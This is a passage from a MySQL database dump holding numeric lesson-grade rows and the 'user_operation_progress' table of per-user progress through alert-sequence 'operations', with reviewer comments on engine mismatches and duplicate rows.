(43, 183, 54, 100.00, 3, 3, 1, '2026-02-20 04:23:32'),
(44, 214, 54, 100.00, 3, 3, 1, '2026-02-27 06:31:25'),
(45, 214, 55, 100.00, 3, 3, 1, '2026-02-27 06:36:08'),
(46, 232, 221, 100.00, 3, 3, 1, '2026-03-03 06:05:08'),
(47, 232, 222, 100.00, 3, 3, 1, '2026-03-04 03:50:31'),
(48, 232, 223, 100.00, 3, 3, 1, '2026-03-04 03:56:30'),
(49, 232, 224, 100.00, 3, 3, 1, '2026-03-04 04:43:37'),
(50, 232, 225, 100.00, 3, 3, 1, '2026-03-04 04:44:54'),
(51, 232, 226, 100.00, 3, 3, 1, '2026-03-04 04:52:03'),
(52, 232, 227, 100.00, 3, 3, 1, '2026-03-04 16:17:55'),
(53, 232, 228, 88.89, 9, 8, 1, '2026-03-04 16:19:09'),
(54, 237, 1, 100.00, 3, 3, 1, '2026-03-04 16:20:30'),
(55, 232, 231, 100.00, 3, 3, 1, '2026-03-05 04:02:10'),
(56, 225, 1, 100.00, 3, 3, 1, '2026-03-05 04:46:03'),
(57, 225, 2, 100.00, 3, 3, 1, '2026-03-05 04:49:22'),
(58, 225, 3, 100.00, 3, 3, 1, '2026-03-05 04:53:13'),
(59, 225, 4, 100.00, 3, 3, 1, '2026-03-05 04:55:06'),
(60, 225, 5, 100.00, 3, 3, 1, '2026-03-05 04:56:38'),
(61, 232, 232, 100.00, 3, 3, 1, '2026-03-05 05:26:14'),
(62, 232, 233, 100.00, 3, 3, 1, '2026-03-05 05:30:25'),
(63, 260, 1, 100.00, 3, 3, 1, '2026-03-07 11:50:16'),
(64, 232, 234, 100.00, 3, 3, 1, '2026-03-07 15:09:30'),
(65, 232, 235, 100.00, 3, 3, 1, '2026-03-08 09:13:57'),
(66, 260, 2, 100.00, 3, 3, 1, '2026-03-08 09:14:32'),
(67, 232, 236, 83.33, 6, 5, 1, '2026-03-08 09:15:35'),
(68, 260, 3, 100.00, 3, 3, 1, '2026-03-08 09:33:23'),
(69, 260, 4, 100.00, 3, 3, 1, '2026-03-08 09:46:06'),
(70, 232, 241, 100.00, 3, 3, 1, '2026-03-08 09:47:57'),
(71, 232, 242, 100.00, 3, 3, 1, '2026-03-08 09:50:04'),
(72, 260, 5, 100.00, 3, 3, 1, '2026-03-08 09:56:56'),
(73, 232, 243, 100.00, 3, 3, 1, '2026-03-08 10:16:50'),
(74, 232, 244, 100.00, 3, 3, 1, '2026-03-08 10:18:46'),
(75, 232, 245, 100.00, 3, 3, 1, '2026-03-08 10:21:33'),
(76, 232, 246, 100.00, 3, 3, 1, '2026-03-08 10:35:49'),
(77, 232, 247, 83.33, 6, 5, 1, '2026-03-08 10:37:56'),
(78, 232, 251, 100.00, 3, 3, 1, '2026-03-08 11:26:58'),
(79, 232, 252, 100.00, 3, 3, 1, '2026-03-08 14:19:55'),
(80, 232, 253, 100.00, 3, 3, 1, '2026-03-08 14:25:49'),
(81, 232, 254, 100.00, 3, 3, 1, '2026-03-08 14:33:28'),
(82, 232, 255, 100.00, 3, 3, 1, '2026-03-08 14:46:03'),
(83, 232, 256, 83.33, 6, 5, 1, '2026-03-08 14:47:32'),
(84, 232, 261, 100.00, 3, 3, 1, '2026-03-09 13:56:58'),
(85, 232, 262, 100.00, 3, 3, 1, '2026-03-09 13:58:29'),
(86, 232, 263, 100.00, 3, 3, 1, '2026-03-09 14:00:37'),
(87, 232, 264, 100.00, 3, 3, 1, '2026-03-09 14:03:33'),
(88, 232, 265, 100.00, 3, 3, 1, '2026-03-09 14:04:53'),
(89, 232, 266, 100.00, 3, 3, 1, '2026-03-09 14:12:51'),
(90, 232, 267, 83.33, 6, 5, 1, '2026-03-09 14:13:37'),
(91, 232, 272, 100.00, 3, 3, 1, '2026-03-09 17:37:40'),
(92, 232, 273, 100.00, 3, 3, 1, '2026-03-09 17:54:56'),
(93, 232, 274, 100.00, 3, 3, 1, '2026-03-09 18:04:05'),
(94, 232, 275, 100.00, 3, 3, 1, '2026-03-09 18:05:08'),
(95, 232, 276, 100.00, 3, 3, 1, '2026-03-09 18:06:01'),
(96, 232, 277, 100.00, 3, 3, 1, '2026-03-09 18:06:55'),
(97, 232, 278, 100.00, 6, 6, 1, '2026-03-09 18:07:53'),
(98, 232, 271, 100.00, 3, 3, 1, '2026-03-09 18:08:51'),
(99, 232, 281, 100.00, 3, 3, 1, '2026-03-09 18:09:50'),
(100, 232, 282, 100.00, 3, 3, 1, '2026-03-09 18:10:33'),
(101, 232, 283, 100.00, 3, 3, 1, '2026-03-09 18:11:19'),
(102, 232, 284, 100.00, 3, 3, 1, '2026-03-09 18:12:22'),
(103, 232, 285, 100.00, 3, 3, 1, '2026-03-09 18:13:08'),
(104, 232, 286, 100.00, 3, 3, 1, '2026-03-09 18:13:51'),
(105, 232, 287, 100.00, 6, 6, 1, '2026-03-09 18:14:24'),
(106, 232, 296, 100.00, 3, 3, 1, '2026-03-10 16:36:41'),
(107, 232, 297, 83.33, 6, 5, 1, '2026-03-10 16:37:30'),
(108, 232, 291, 100.00, 3, 3, 1, '2026-03-10 16:42:22'),
(109, 232, 292, 100.00, 3, 3, 1, '2026-03-10 16:46:21'),
(110, 232, 293, 100.00, 3, 3, 1, '2026-03-10 16:56:35'),
(111, 232, 294, 100.00, 3, 3, 1, '2026-03-10 16:58:05'),
(112, 232, 295, 100.00, 3, 3, 1, '2026-03-10 17:05:44'),
(113, 232, 301, 100.00, 3, 3, 1, '2026-03-10 17:32:44'),
(114, 232, 302, 100.00, 3, 3, 1, '2026-03-10 17:37:09'),
(115, 232, 303, 100.00, 3, 3, 1, '2026-03-10 17:40:12'),
(116, 232, 304, 100.00, 3, 3, 1, '2026-03-10 17:48:57'),
(117, 232, 305, 100.00, 3, 3, 1, '2026-03-10 17:51:34'),
(118, 232, 306, 100.00, 3, 3, 1, '2026-03-10 17:54:28'),
(119, 232, 307, 100.00, 6, 6, 1, '2026-03-10 17:54:51'),
(120, 225, 32, 100.00, 3, 3, 1, '2026-03-10 22:49:31'),
(121, 225, 33, 100.00, 3, 3, 1, '2026-03-10 22:54:36'),
(122, 225, 34, 100.00, 3, 3, 1, '2026-03-11 04:06:24'),
(123, 260, 22, 100.00, 3, 3, 1, '2026-03-11 04:52:11'),
(124, 260, 23, 100.00, 3, 3, 1, '2026-03-11 04:57:08'),
(125, 232, 311, 100.00, 3, 3, 1, '2026-03-11 16:47:51'),
(126, 232, 312, 100.00, 3, 3, 1, '2026-03-11 16:54:38'),
(127, 232, 313, 100.00, 3, 3, 1, '2026-03-11 17:07:42'),
(128, 232, 314, 100.00, 3, 3, 1, '2026-03-11 17:10:35'),
(129, 232, 315, 100.00, 3, 3, 1, '2026-03-11 17:11:59'),
(130, 232, 316, 100.00, 6, 6, 1, '2026-03-11 17:15:46'),
(131, 225, 35, 100.00, 3, 3, 1, '2026-03-12 03:20:06'),
(132, 225, 36, 100.00, 3, 3, 1, '2026-03-12 03:22:44'),
(133, 225, 37, 100.00, 3, 3, 1, '2026-03-12 04:05:07'),
(134, 225, 38, 100.00, 3, 3, 1, '2026-03-12 05:09:40'),
(135, 225, 39, 100.00, 3, 3, 1, '2026-03-12 05:13:48'),
(136, 225, 22, 100.00, 3, 3, 1, '2026-03-12 05:21:05'),
(137, 225, 23, 100.00, 3, 3, 1, '2026-03-12 05:22:49'),
(138, 225, 24, 100.00, 3, 3, 1, '2026-03-12 05:24:54'),
(139, 225, 25, 100.00, 3, 3, 1, '2026-03-12 05:28:37'),
(140, 225, 26, 100.00, 3, 3, 1, '2026-03-12 05:30:18'),
(141, 225, 27, 100.00, 3, 3, 1, '2026-03-12 05:31:38'),
(142, 225, 28, 100.00, 3, 3, 1, '2026-03-12 05:33:03'),
(143, 225, 30, 100.00, 3, 3, 1, '2026-03-12 05:34:29'),
(144, 225, 31, 90.00, 20, 18, 1, '2026-03-12 05:36:52'),
(145, 42, 350, 100.00, 1, 1, 1, '2026-03-12 11:48:00'),
(146, 283, 350, 100.00, 1, 1, 1, '2026-03-12 21:48:04'), -- later than the rows that follow: ids are not chronological
(147, 283, 351, 100.00, 1, 1, 1, '2026-03-12 12:26:01'),
(148, 283, 352, 100.00, 1, 1, 1, '2026-03-12 12:36:01'),
(149, 283, 353, 100.00, 1, 1, 1, '2026-03-12 12:52:02'),
(150, 283, 359, 100.00, 1, 1, 1, '2026-03-14 22:07:23'),
(151, 283, 360, 100.00, 1, 1, 1, '2026-03-14 22:07:29'),
(152, 283, 349, 100.00, 1, 1, 1, '2026-03-14 22:00:17'),
(153, 225, 40, 100.00, 3, 3, 1, '2026-03-13 02:27:17'),
(154, 225, 41, 100.00, 3, 3, 1, '2026-03-13 02:33:06'),
(155, 225, 42, 100.00, 3, 3, 1, '2026-03-13 02:35:33'),
(156, 225, 43, 100.00, 3, 3, 1, '2026-03-13 02:36:38'),
(157, 225, 44, 100.00, 3, 3, 1, '2026-03-13 02:38:02'),
(158, 225, 45, 100.00, 3, 3, 1, '2026-03-13 02:39:30'),
(159, 225, 46, 100.00, 3, 3, 1, '2026-03-13 02:41:07'),
(160, 225, 47, 95.00, 20, 19, 1, '2026-03-13 02:43:55'),
(161, 225, 349, 100.00, 1, 1, 1, '2026-03-13 03:00:01'),
(162, 225, 350, 100.00, 1, 1, 1, '2026-03-13 03:04:01'),
(163, 225, 351, 100.00, 1, 1, 1, '2026-03-13 03:31:03'),
(164, 42, 54, 0.00, 3, 0, 0, '2026-03-13 10:09:26'), -- 0/3, failed attempt (passed = 0)
(165, 232, 324, 100.00, 3, 3, 1, '2026-03-13 16:06:33'),
(166, 232, 325, 100.00, 3, 3, 1, '2026-03-13 16:09:15'),
(167, 232, 326, 83.33, 6, 5, 1, '2026-03-13 16:10:25'),
(168, 232, 321, 100.00, 3, 3, 1, '2026-03-13 16:15:55'),
(169, 232, 322, 100.00, 3, 3, 1, '2026-03-13 16:17:25'),
(170, 232, 323, 100.00, 3, 3, 1, '2026-03-13 16:18:41'),
(171, 232, 331, 100.00, 3, 3, 1, '2026-03-14 04:50:03'),
(172, 232, 332, 100.00, 3, 3, 1, '2026-03-14 04:52:42'),
(173, 232, 333, 100.00, 3, 3, 1, '2026-03-14 04:56:28'),
(174, 232, 334, 100.00, 3, 3, 1, '2026-03-14 04:57:45'),
(175, 232, 335, 100.00, 3, 3, 1, '2026-03-14 04:58:49'),
(176, 232, 336, 100.00, 6, 6, 1, '2026-03-14 04:59:17'),
(177, 232, 341, 100.00, 3, 3, 1, '2026-03-14 05:01:01'),
(178, 232, 342, 100.00, 3, 3, 1, '2026-03-14 05:02:11'),
(179, 232, 343, 100.00, 3, 3, 1, '2026-03-14 05:03:17'),
(180, 232, 344, 100.00, 3, 3, 1, '2026-03-14 05:03:58'),
(181, 232, 345, 100.00, 3, 3, 1, '2026-03-14 05:04:34'),
(182, 232, 346, 100.00, 6, 6, 1, '2026-03-14 05:05:01'),
(183, 232, 364, 85.00, 1, 1, 1, '2026-03-15 15:55:44'),
(184, 225, 352, 100.00, 1, 1, 1, '2026-03-15 10:41:01'),
(185, 225, 353, 100.00, 1, 1, 1, '2026-03-15 10:51:00'),
(186, 260, 24, 100.00, 3, 3, 1, '2026-03-15 13:50:58'),
(187, 260, 25, 100.00, 3, 3, 1, '2026-03-15 14:01:10'),
(188, 260, 26, 100.00, 3, 3, 1, '2026-03-15 14:12:56'),
(189, 232, 365, 100.00, 1, 1, 1, '2026-03-15 17:12:24'),
(190, 260, 27, 100.00, 3, 3, 1, '2026-03-15 16:04:37'),
(191, 260, 28, 100.00, 3, 3, 1, '2026-03-15 16:15:06'),
(192, 260, 30, 100.00, 3, 3, 1, '2026-03-15 16:29:36'),
(193, 260, 31, 80.00, 20, 16, 1, '2026-03-15 16:59:18'),
(194, 232, 361, 100.00, 1, 1, 1, '2026-03-15 17:12:38'),
(195, 303, 221, 100.00, 3, 3, 1, '2026-03-15 17:37:43'),
(196, 232, 362, 100.00, 1, 1, 1, '2026-03-15 18:20:37'),
(197, 260, 40, 100.00, 3, 3, 1, '2026-03-15 18:10:50'),
(198, 232, 363, 100.00, 1, 1, 1, '2026-03-15 18:20:42'),
(199, 232, 366, 100.00, 1, 1, 1, '2026-03-15 18:20:01'),
(200, 260, 41, 100.00, 3, 3, 1, '2026-03-15 18:24:14'),
(201, 260, 42, 100.00, 3, 3, 1, '2026-03-15 18:57:22'),
(202, 260, 43, 100.00, 3, 3, 1, '2026-03-15 19:44:15'),
(203, 260, 44, 100.00, 3, 3, 1, '2026-03-15 20:23:12'),
(204, 260, 45, 100.00, 3, 3, 1, '2026-03-15 20:44:14'),
(205, 260, 46, 100.00, 3, 3, 1, '2026-03-15 21:16:41'),
(206, 260, 47, 100.00, 20, 20, 1, '2026-03-15 21:27:59'),
(207, 225, 359, 100.00, 1, 1, 1, '2026-03-16 02:59:00'),
(208, 225, 360, 100.00, 1, 1, 1, '2026-03-16 03:07:01'),
(209, 225, 367, 100.00, 1, 1, 1, '2026-03-16 03:19:04');

-- --------------------------------------------------------

--
-- Table structure for table `user_operation_progress`
--

-- Tracks how far a user has advanced through an "operation" (a sequence of
-- alerts). Timestamps were exported with the session time zone at +00:00,
-- so they are UTC.
-- NOTE(review): this table is MyISAM/latin1 while `user_lesson_grades` is
-- InnoDB/utf8mb4. MyISAM does not enforce FOREIGN KEYs and is not
-- transactional, so the START TRANSACTION wrapper around this dump does not
-- cover it; confirm the mismatch is intentional.
-- There is also no UNIQUE(user_id, operation_id): the data that follows holds
-- several rows for the same pair (e.g. ids 182, 183, 185 and 186 are all
-- user 225 / operation 1), so readers must not assume one progress row per
-- user and operation.
CREATE TABLE `user_operation_progress` (
  `id` int(11) NOT NULL,                       -- surrogate key; PRIMARY KEY / AUTO_INCREMENT presumably added by a later ALTER TABLE in this dump — not visible here
  `user_id` int(11) NOT NULL,                  -- no FK declared (and MyISAM would not enforce one)
  `operation_id` int(11) NOT NULL,             -- no FK declared
  `current_alert_sequence` int(11) DEFAULT 1,  -- position within the operation's alert sequence; starts at 1 by default
  `started_at` timestamp NOT NULL DEFAULT current_timestamp(),
  `completed_at` timestamp NULL DEFAULT NULL   -- NULL while the operation is still in progress
) ENGINE=MyISAM DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;

--
-- Dumping data for table `user_operation_progress`
--

INSERT INTO `user_operation_progress` (`id`, `user_id`, `operation_id`, `current_alert_sequence`, `started_at`, `completed_at`) VALUES
(1, 34, 1, 3, '2025-12-31 13:11:32', NULL),
(2, 34, 7, 2, '2026-01-02 04:31:15', NULL),
(3, 1, 37, 1, '2026-01-05 03:22:25', NULL),
(4, 34, 37, 2, '2026-01-06 00:53:10', NULL),
(5, 1, 47, 1, '2026-01-06 01:49:25', NULL),
(6, 1, 48, 1, '2026-01-06 19:45:51', NULL),
(7, 68, 48, 4, '2026-01-07 16:11:48', NULL),
(8, 34, 48, 1, '2026-01-11 01:35:25', NULL),
(9, 34, 51, 1, '2026-01-11 01:38:00', NULL),
(10, 74, 1, 1, '2026-01-12 06:24:54', NULL),
(11, 74, 64, 1, '2026-01-12 06:43:33', NULL),
(12, 74, 60, 1, '2026-01-12 06:46:32', NULL),
(13, 78, 1, 1, '2026-01-14 03:22:08', NULL),
(14, 74, 72, 1, '2026-01-14 06:36:01', NULL),
(15, 85, 1, 1, '2026-01-16 13:33:40', NULL),
(16, 34, 63, 1, '2026-01-16 23:27:28', '2026-01-16 23:28:03'),
(17, 54, 1, 3, '2026-01-17 03:00:58', NULL),
(18, 74, 93, 3, '2026-01-17 08:47:02', NULL),
(19, 52, 1, 1, '2026-01-19 08:45:34', NULL),
(20, 91, 1, 1, '2026-01-20 10:38:53', NULL),
(21, 93, 1, 2, '2026-01-20 20:57:32', NULL),
(22, 94, 1, 1, '2026-01-21 01:57:29', NULL),
(23, 95, 1, 2, '2026-01-21 17:18:27', NULL),
(24, 96, 1, 1, '2026-01-22 04:14:25', NULL),
(25, 56, 1, 1, '2026-01-23 06:03:09', NULL),
(26, 42, 1, 1, '2026-01-23 08:19:36', NULL),
(27, 97, 1, 1, '2026-01-25 05:05:04', NULL),
(28, 98, 1, 1, '2026-01-25 08:18:38', NULL),
(29, 99, 1, 1, '2026-01-25 15:14:16', NULL),
(30, 102, 1, 1, '2026-01-25 21:55:00', NULL),
(31, 34, 46, 1, '2026-01-26 03:04:08', '2026-02-11 03:06:48'),
(32, 1, 103, 1, '2026-01-27 02:09:47', NULL),
(33, 107, 1, 1, '2026-01-27 19:45:55', NULL),
(34, 108, 1, 1, '2026-01-27 19:55:53', NULL),
(35, 109, 1, 1, '2026-01-27 21:08:02', NULL),
(36, 34, 76, 1, '2026-01-31 04:16:18', '2026-01-31 04:16:33'),
(37, 115, 1, 1, '2026-01-31 12:38:02', NULL),
(38, 116, 1, 1, '2026-02-01 09:07:07', NULL),
(39, 116, 115, 2, '2026-02-01 09:11:43', NULL),
(40, 123, 1, 1, '2026-02-02 10:07:03', NULL),
(41, 124, 1, 1, '2026-02-02 10:09:53', NULL),
(42, 125, 1, 1, '2026-02-04 01:34:01', NULL),
(43, 126, 1, 1, '2026-02-04 22:06:35', NULL),
(44, 65, 1, 1, '2026-02-05 16:49:25', NULL),
(45, 127, 1, 1, '2026-02-05 17:48:46', NULL),
(46, 128, 1, 1, '2026-02-07 01:17:23', NULL),
(47, 129, 1, 1, '2026-02-07 21:51:46', NULL),
(48, 131, 1, 1, '2026-02-08 08:16:29', NULL),
(49, 133, 1, 1, '2026-02-08 16:07:44', NULL),
(50, 135, 1, 1, '2026-02-08 17:42:27', NULL),
(51, 136, 1, 1, '2026-02-09 22:07:29', NULL),
(52, 137, 1, 1, '2026-02-10 12:44:50', NULL),
(53, 34, 46, 1, '2026-02-11 03:06:15', '2026-02-11 03:06:48'),
(54, 138, 1, 2, '2026-02-11 17:02:53', NULL),
(55, 140, 1, 3, '2026-02-11 17:05:54', NULL),
(56, 141, 1, 1, '2026-02-12 03:16:23', NULL),
(57, 34, 19, 1, '2026-02-13 01:42:45', '2026-02-13 01:43:55'),
(58, 78, 30, 1, '2026-02-13 18:54:36', '2026-02-13 18:54:55'),
(59, 118, 99, 1, '2026-02-13 19:35:23', NULL),
(60, 1, 43, 1, '2026-02-13 23:18:41', NULL),
(61, 142, 1, 2, '2026-02-14 06:28:27', NULL),
(62, 142, 142, 5, '2026-02-14 06:32:08', '2026-02-14 06:32:08'),
(63, 145, 136, 1, '2026-02-14 09:37:08', NULL),
(64, 146, 14, 1, '2026-02-14 15:55:35', NULL),
(65, 147, 93, 1, '2026-02-14 16:15:39', '2026-02-14 16:16:20'),
(66, 149, 145, 1, '2026-02-14 17:56:15', NULL),
(67, 150, 79, 1, '2026-02-14 18:36:43', NULL),
(68, 151, 19, 1, '2026-02-14 19:17:56', NULL),
(69, 109, 56, 1, '2026-02-14 22:49:58', '2026-02-14 22:51:58'),
(70, 152, 118, 1, '2026-02-15 01:20:47', NULL),
(71, 153, 1, 1, '2026-02-15 01:39:11', NULL),
(72, 154, 116, 1, '2026-02-15 03:41:10', '2026-02-15 03:41:24'),
(73, 148, 1, 1, '2026-02-15 04:20:47', '2026-02-15 04:23:04'),
(74, 99, 80, 1, '2026-02-15 04:37:19', NULL),
(75, 156, 19, 1, '2026-02-15 20:44:15', NULL),
(76, 158, 8, 1, '2026-02-15 23:21:40', '2026-02-15 23:23:25'),
(77, 159, 1, 1, '2026-02-15 23:22:22', NULL),
(78, 109, 109, 1, '2026-02-15 23:26:01', '2026-02-15 23:28:14'),
(79, 160, 145, 1, '2026-02-15 23:40:46', '2026-02-15 23:41:56'),
(80, 102, 145, 1, '2026-02-16 02:43:25', NULL),
(82, 60, 1, 1, '2026-02-16 06:05:50', NULL),
(83, 164, 61, 1, '2026-02-16 14:54:21', '2026-02-16 14:54:37'),
(84, 165, 3, 1, '2026-02-16 17:15:55', '2026-02-16 17:17:14'),
(85, 99, 25, 1, '2026-02-16 17:17:59', '2026-02-16 17:20:58'),
(86, 165, 1, 1, '2026-02-16 17:39:33', NULL),
(87, 45, 1, 1, '2026-02-17 02:54:23', NULL),
(88, 34, 12, 1, '2026-02-17 03:28:12', NULL),
(89, 165, 82, 1, '2026-02-17 05:23:36', '2026-02-17 05:24:12'),
(90, 78, 81, 1, '2026-02-17 05:59:04', NULL),
(91, 166, 1, 1, '2026-02-17 15:29:09', NULL),
(92, 109, 59, 1, '2026-02-17 15:43:00', '2026-02-17 15:45:26'),
(93, 108, 143, 1, '2026-02-17 17:17:01', NULL),
(94, 112, 52, 1, '2026-02-17 20:47:45', NULL),
(95, 157, 1, 1, '2026-02-17 22:29:14', NULL),
(96, 119, 54, 1, '2026-02-17 23:50:59', NULL),
(97, 78, 7, 1, '2026-02-18 02:24:52', '2026-02-18 02:25:05'),
(98, 168, 84, 1, '2026-02-18 06:47:55', NULL),
(99, 169, 1, 5, '2026-02-18 07:17:18', '2026-02-18 07:27:51'),
(100, 169, 2, 4, '2026-02-18 07:28:06', '2026-02-18 07:31:05'),
(101, 169, 3, 4, '2026-02-18 07:31:21', '2026-02-18 07:36:03'),
(102, 169, 4, 4, '2026-02-18 07:36:11', NULL),
(103, 170, 1, 1, '2026-02-18 08:19:53', NULL),
(104, 171, 1, 1, '2026-02-18 09:49:56', NULL),
(105, 172, 36, 1, '2026-02-18 11:06:12', NULL),
(106, 173, 44, 1, '2026-02-18 12:16:17', '2026-02-18 12:17:21'),
(107, 109, 81, 1, '2026-02-18 13:56:43', '2026-02-18 13:58:20'),
(108, 174, 99, 1, '2026-02-18 15:07:23', '2026-02-18 15:09:51'),
(109, 175, 22, 1, '2026-02-18 15:41:24', '2026-02-18 15:43:57'),
(110, 165, 131, 1, '2026-02-18 17:08:15', '2026-02-18 17:08:57'),
(111, 176, 113, 1, '2026-02-19 03:47:20', '2026-02-19 03:48:49'),
(112, 177, 114, 1, '2026-02-19 04:07:13', '2026-02-19 04:09:38'),
(113, 178, 1, 1, '2026-02-19 05:19:23', NULL),
(114, 177, 1, 5, '2026-02-19 14:40:27', '2026-02-22 11:08:36'),
(115, 180, 89, 1, '2026-02-19 15:51:29', '2026-02-19 15:52:17'),
(116, 109, 104, 1, '2026-02-19 16:01:54', '2026-02-19 16:03:27'),
(117, 175, 89, 1, '2026-02-20 02:17:31', '2026-02-20 13:03:09'),
(118, 34, 42, 1, '2026-02-20 02:50:13', NULL),
(119, 181, 1, 1, '2026-02-20 03:05:11', NULL),
(120, 183, 1, 1, '2026-02-20 03:55:15', NULL),
(121, 184, 1, 3, '2026-02-20 08:05:25', NULL),
(122, 185, 1, 1, '2026-02-20 08:58:30', NULL),
(123, 186, 69, 1, '2026-02-20 16:30:51', '2026-02-20 16:31:27'),
(124, 187, 136, 1, '2026-02-21 03:07:23', '2026-02-21 03:09:46'),
(125, 187, 1, 1, '2026-02-21 03:11:46', NULL),
(126, 109, 90, 1, '2026-02-21 18:50:03', '2026-02-21 18:51:37'),
(127, 189, 1, 5, '2026-02-21 19:38:33', '2026-02-21 22:29:17'),
(128, 188, 120, 1, '2026-02-21 20:50:44', '2026-02-21 20:52:51'),
(129, 189, 2, 4, '2026-02-21 22:30:34', '2026-02-22 00:38:38'),
(130, 189, 3, 4, '2026-02-22 00:40:04', '2026-02-23 02:15:23'),
(131, 177, 74, 1, '2026-02-22 05:05:18', '2026-02-22 05:10:43'),
(132, 177, 15, 5, '2026-02-22 10:33:25', '2026-02-22 10:44:48'),
(133, 177, 2, 1, '2026-02-22 11:08:55', NULL),
(134, 193, 81, 1, '2026-02-22 18:25:25', NULL),
(135, 112, 10, 1, '2026-02-23 01:29:59', NULL),
(136, 189, 4, 4, '2026-02-23 02:15:42', '2026-02-23 03:12:26'),
(137, 189, 5, 5, '2026-02-23 03:12:43', '2026-02-27 02:46:10'),
(138, 194, 10, 1, '2026-02-23 03:20:45', NULL),
(139, 165, 78, 1, '2026-02-23 06:34:21', NULL),
(140, 177, 7, 1, '2026-02-23 10:45:30', '2026-02-23 10:50:10'),
(141, 180, 59, 1, '2026-02-23 11:36:26', '2026-02-23 11:37:01'),
(142, 195, 113, 1, '2026-02-23 16:01:00', NULL),
(143, 196, 139, 1, '2026-02-23 17:35:14', '2026-02-23 17:37:08'),
(144, 177, 93, 1, '2026-02-23 21:05:40', '2026-02-23 21:09:50'),
(145, 198, 1, 1, '2026-02-23 23:51:06', NULL),
(146, 199, 1, 1, '2026-02-23 23:52:05', NULL),
(147, 196, 88, 1, '2026-02-24 03:21:41', '2026-02-24 03:23:28'),
(148, 202, 58, 1, '2026-02-24 15:35:45', '2026-02-24 15:37:55'),
(149, 78, 115, 1, '2026-02-24 16:01:03', NULL),
(150, 182, 90, 1, '2026-02-24 18:45:27', NULL),
(151, 203, 19, 1, '2026-02-24 19:50:13', NULL),
(152, 165, 11, 1, '2026-02-24 19:51:32', NULL),
(153, 204, 57, 1, '2026-02-24 20:48:39', NULL),
(155, 180, 46, 1, '2026-02-25 09:53:00', '2026-02-25 09:53:22'),
(156, 208, 51, 1, '2026-02-25 10:32:34', '2026-02-25 10:40:02'),
(157, 209, 1, 1, '2026-02-25 11:04:36', NULL),
(158, 177, 112, 1, '2026-02-25 12:03:44', '2026-02-25 12:05:36'),
(159, 174, 86, 1, '2026-02-26 04:33:35', '2026-02-26 04:39:34'),
(160, 174, 1, 1, '2026-02-26 04:41:54', NULL),
(161, 109, 6, 1, '2026-02-26 05:34:29', NULL),
(162, 195, 10, 1, '2026-02-26 07:41:11', '2026-02-26 07:42:54'),
(163, 99, 140, 1, '2026-02-26 15:01:13', '2026-02-26 15:06:18'),
(164, 213, 1, 5, '2026-02-26 21:11:50', '2026-02-26 21:35:25'),
(165, 213, 2, 4, '2026-02-26 21:35:33', '2026-02-26 21:43:14'),
(166, 210, 1, 1, '2026-02-26 21:36:40', NULL),
(167, 213, 3, 4, '2026-02-26 21:43:21', '2026-02-26 21:47:43'),
(168, 213, 4, 4, '2026-02-26 21:47:47', '2026-02-26 21:54:38'),
(169, 213, 5, 1, '2026-02-26 21:54:45', NULL),
(170, 189, 6, 4, '2026-02-27 02:46:32', '2026-02-27 02:57:42'),
(171, 189, 7, 5, '2026-02-27 02:57:56', '2026-03-04 01:54:55'),
(172, 209, 102, 1, '2026-02-27 04:00:53', '2026-02-27 04:02:21'),
(173, 214, 1, 1, '2026-02-27 06:14:06', NULL),
(174, 196, 7, 1, '2026-02-27 06:47:08', '2026-02-27 06:49:04'),
(175, 196, 1, 5, '2026-02-27 06:52:53', '2026-02-27 07:06:44'),
(176, 196, 2, 1, '2026-02-27 07:06:58', NULL),
(177, 99, 107, 1, '2026-02-27 15:43:48', '2026-02-27 15:49:29'),
(178, 217, 1, 1, '2026-03-01 03:17:30', NULL),
(179, 223, 1, 1, '2026-03-01 15:51:16', NULL),
(180, 224, 1, 1, '2026-03-01 15:54:55', NULL),
(181, 177, 111, 1, '2026-03-01 21:46:27', '2026-03-01 21:49:08'),
(182, 225, 1, 3, '2026-03-02 01:00:00', NULL),
(183, 225, 1, 3, '2026-03-02 05:24:48', NULL),
(184, 226, 1, 1, '2026-03-02 05:27:10', NULL),
(185, 225, 1, 3, '2026-03-02 05:27:39', NULL),
(186, 225, 1, 3, '2026-03-02 05:29:01', NULL),
(187, 228, 99, 1, '2026-03-02 12:00:21', NULL),
(188, 109, 78, 1, '2026-03-02 12:23:27', '2026-03-02 12:24:36'),
(189, 229, 1, 2, '2026-03-02 15:05:11', NULL),
(190, 220, 140, 1, '2026-03-02 20:08:33', NULL),
(191, 231, 146, 1, '2026-03-02 20:16:34', '2026-03-02 20:20:57'),
(192, 232, 1, 5, '2026-03-03 03:14:28', '2026-03-07 13:56:20'),
(193, 230, 43, 1, '2026-03-03 04:59:35', '2026-03-03 05:03:10'),
(194, 177, 13, 1, '2026-03-03 08:32:24', '2026-03-03 08:34:38'),
(195, 178, 159, 3, '2026-03-03 08:42:53', NULL),
(196, 178, 159, 3, '2026-03-03 08:44:54', NULL),
(197, 178, 159, 3, '2026-03-03 08:46:47', NULL),
(198, 233, 1, 1, '2026-03-03 09:48:25', NULL),
(199, 220, 141, 1, '2026-03-03 14:40:33', '2026-03-03 14:40:53'),
(200, 56, 159, 1, '2026-03-03 15:51:36', NULL),
(201, 234, 1, 1, '2026-03-03 19:44:00', NULL),
(202, 235, 1, 1, '2026-03-03 20:13:02', NULL),
(203, 109, 82, 1, '2026-03-03 22:21:59', '2026-03-03 22:23:39'),
(204, 236, 134, 1, '2026-03-03 23:25:19', NULL),
(205, 237, 1, 1, '2026-03-03 23:25:53', NULL),
(206, 189, 7, 5, '2026-03-04 01:46:47', '2026-03-04 01:54:55'),
(207, 189, 7, 5, '2026-03-04 01:50:03', '2026-03-04 01:54:55'),
(208, 189, 7, 5, '2026-03-04 01:51:27', '2026-03-04 01:54:55'),
(209, 189, 7, 5, '2026-03-04 01:53:15', '2026-03-04 01:54:55'),
(210, 189, 7, 5, '2026-03-04 01:54:55', '2026-03-04 01:54:55'),
(211, 239, 40, 1, '2026-03-04 07:04:47', NULL),
(212, 240, 138, 1, '2026-03-04 09:35:57', '2026-03-04 09:36:42'),
(213, 241, 1, 1, '2026-03-04 16:22:18', NULL),
(214, 244, 1, 1, '2026-03-04 20:19:53', NULL),
(215, 239, 42, 1, '2026-03-04 22:47:56', '2026-03-04 22:51:43'),
(216, 245, 1, 1, '2026-03-05 04:55:30', NULL),
(217, 225, 162, 5, '2026-03-05 05:21:53', '2026-03-05 05:27:14'),
(218, 225, 162, 5, '2026-03-05 05:23:22', '2026-03-05 05:27:14'),
(219, 225, 162, 5, '2026-03-05 05:24:43', '2026-03-05 05:27:14'),
(220, 225, 162, 5, '2026-03-05 05:26:15', '2026-03-05 05:27:14'),
